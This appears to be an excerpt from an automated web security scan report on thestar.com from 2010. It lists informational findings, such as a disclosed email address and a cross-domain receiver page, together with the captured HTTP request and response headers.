HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Sat, 20 Nov 2010 05:18:13 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-2 cache-control: public, max-age=300 X-TOPS-CacheReason: TheStarHomePage Date: Sat, 20 Nov 2010 05:18:18 GMT X-Varnish: 848707087 848706977 Age: 1 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish3 X-Cache: HIT X-Cache-Hits: 1 Set-Cookie: BIGipServerTOPS-WebFarm5 Content-Length: 206141 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | / |
GET / HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.google.com/url Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.thestar.com Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Sat, 20 Nov 2010 05:18:13 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-2 cache-control: public, max-age=300 X-TOPS-CacheReason: TheStarHomePage Date: Sat, 20 Nov 2010 05:18:18 GMT X-Varnish: 848707087 848706977 Age: 1 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish3 X-Cache: HIT X-Cache-Hits: 1 Set-Cookie: BIGipServerTOPS-WebFarm5 Content-Length: 206141 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="mailto:publiced@thestar.ca" > ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | /searchresults |
GET /searchresults?AssetType Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.thestar.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-4 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:20:24 GMT X-Varnish: 2024493633 2024488280 Age: 63 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 1 Content-Length: 80767 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="mailto:publiced@thestar.ca" > ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | /xd_receiver.htm |
GET /xd_receiver.htm HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.facebook.com Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Wed, 29 Jul 2009 19:35:26 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-1 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:19:34 GMT X-Varnish: 2024489808 2024478896 Age: 137 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 132 Content-Length: 371 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>cross domain receiver pa ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /includes/columnist |
GET /includes/columnist?Query x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://www.thestar.com/ Accept: text/html, */*; q=0.01 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-1 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:19:28 GMT X-Varnish: 2024489299 2024471800 Age: 224 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 185 Content-Length: 4812 <option>Select Columnist</option> <option value="/news/columnists ...[SNIP]... |